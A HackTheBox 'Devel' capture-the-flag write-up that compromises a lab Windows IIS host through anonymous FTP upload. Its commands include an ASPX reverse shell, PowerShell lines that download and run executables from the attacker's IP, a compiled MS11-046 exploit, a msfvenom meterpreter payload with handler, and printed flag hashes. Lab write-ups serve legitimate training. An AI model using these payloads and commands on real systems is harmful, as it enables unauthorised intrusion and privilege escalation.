Home HackTheBox - Devel
Post
Cancel

HackTheBox - Devel

Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Devel-full-port-scan.txt 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Microsoft-IIS/7.5 (port 80)

gobuster

1
2
3
4
$ gobuster dir -u http://10.10.10.5 -w /usr/share/dirb/wordlists/common.txt -o services/80-http.txt
#...
/aspnet_client (Status: 301)
#...

FTP (port 21)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ ftp $TARGET
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

There is an aspnet_client folder like on port 80. Let’s see what’s inside:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ftp> cd aspnet_client
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> 

We can log in as anonymous and can write files also:

ftp put hack.txt

FTP files are directly accessible from the web page!


Method #1: without Metasploit

Reverse shell

Because of the folder name aspnet_client, I looked for “asp net reverse shell” and I found this one.

google search

  1. I replaced the IP used in the script by my IP address.

  2. I put the file via FTP

  3. I visited the following URL: http://10.10.10.5/shell.aspx

  4. Then I got a shell:

reverse shell

User

Currently we are iis apppool\web:

1
2
3
c:\windows\system32\inetsrv> whoami
whoami
iis apppool\web

Our goal is to perform privilege escalation(s) in order to obtain as many rights as possible on the target machine.

Let’s list users:

1
2
3
4
5
6
7
8
C:\Users>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

or we can simply do:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
c:\windows\system32\inetsrv>cd \users
cd \users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users

18/03/2017  01:16     <DIR>          .
18/03/2017  01:16     <DIR>          ..
18/03/2017  01:16     <DIR>          Administrator
17/03/2017  04:17     <DIR>          babis
18/03/2017  01:06     <DIR>          Classic .NET AppPool
14/07/2009  09:20     <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  22.277.554.176 bytes free

There are two other users that we are interested to:

  • babis
  • Administrator

systeminfo

systeminfo

The target machine is Microsoft Windows 7 Entreprise server (version → 6.1.7600) with an x86 architecture (32 bits).

Download and execute winPEAS.exe

Let’s go to a word writable directory (C:\Windows\System32\spool\drivers\color) and try to run winPEAS

1
2
3
4
5
6
C:\> cd \windows\system32\spool\drivers\color
C:\Windows\System32\spool\drivers\color>echo amirr0r > test
echo amirr0r > test
C:\Windows\System32\spool\drivers\color>type test
type test
amirr0r

Native wget in powershell:

1
c:> powershell -command "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.14:8000/winPEAS.exe', 'c:\Windows\System32\spool\drivers\color\winPEAS.exe')"

alternative to wget

Looking for exploits

Unfortunately, I didn’t get any output after executing winPEAS.exe so I directly looked for exploits on Microsoft Windows 7:

google search exploits windows 7

MS11-046

Compiling exploits

  1. Getting exploit based on the EDB-ID (Exploit DataBase IDentifier):
1
2
3
4
5
6
7
$ searchsploit -m 40564
  Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
      URL: https://www.exploit-db.com/exploits/40564
     Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /root/htb/machines/Windows/Devel/40564.c
  1. Install apt install mingw-w64

  2. Compile the exploit specifically for target machine:

1
$ i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32

Privesc (system)

Transfer exploit.exe:

  • (Attacker’s machine) run HTTP Server: python3 -m http.server
  • (Victim’s machine) download exploit: powershell -command "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.14:8000/exploit.exe', 'c:\Windows\System32\spool\drivers\color\exploit.exe')"
  • Execute exploit.exe:
1
2
3
4
5
6
c:\Windows\System32\spool\drivers\color>exploit.exe 
exploit.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Flags

1
2
3
4
5
6
7
8
9
10
11
c:\>cd \users
c:\Users>dir /b/s *.txt
    ...
    c:\Users\Administrator\Desktop\root.txt.txt
    ...
    c:\Users\babis\Desktop\user.txt.txt
    ...
c:\Users>type c:\Users\babis\Desktop\user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
c:\Users>type c:\Users\Administrator\Desktop\root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

Method #2: using Metasploit (meterpreter)

1. msfvenom

Preparing our malicious file which1 will give us a meterpreter:

1
2
3
4
5
6
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=4444 -f aspx > meterpreter.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2883 bytes

2. Metasploit multi/handler

We set a listener that can handle a meterpreter session:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ msfconsole
msf6 > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/handler 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.14
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.14:4444 

3. Meterpreter sesssion

Upload the malicious file we prepared via ftp

ftp put meterpreter

Open it from browser so that it can be executed on the server side and pops us a meterpreter:

meterpreter session

I used run -j to run meterpreter session in background while I’ll use suggester.

Suggester

We can Metasploit exploit suggester:

search suggester

suggester

session number is different because I made some tests.

Exploitation

We cannot use he first exploit suggested (exploit/windows/local/bypassuac_eventvwr) since our current user isn’t in the administrators group.

However we can use the second exploit (exploit/windows/local/ms10_015_kitrap0d):

ms10_015_kitrap0d exploit

Flags are above in method #1 - chapter. ___

Method 1

Method 2

This post is licensed under 0x3n0 by the author.

HackTheBox - Legacy

HackTheBox - Optimum